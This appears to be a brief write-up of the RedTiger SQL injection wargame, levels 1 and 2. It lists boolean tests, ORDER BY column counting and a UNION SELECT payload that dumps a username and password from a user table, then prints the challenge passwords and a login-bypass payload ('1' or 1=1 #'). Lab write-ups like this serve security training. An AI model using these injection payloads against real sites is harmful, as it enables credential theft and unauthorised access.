If we click on the Category its adds a ?cat=1 to the URL.

Let's try adding ?cat=1 and 1 and 1=1# which gives as the same result, a ?cat=1 and 1 and 1=2# on the other hand generates an error.

We can find out how many columns the table has with ?cat=1 order by 5#, since 5 gives us an error and 4 not, there are 4 columns, 3 and 4 can be used to display outputs ?cat=1 union select 1,2,3,4 from level1_users#

Let's get the password ?cat=1 union select 1,2,username,password from level1_users #

The user is Hornoxe and the password thatwaseasy

The password is passwords_will_change_over_time_let_us_do_a_shitty_rhyme

RedTiger 2

Target: Login

Hint: Condition

We can try to use an always-true-condition for the username and password 1' or 1=1 #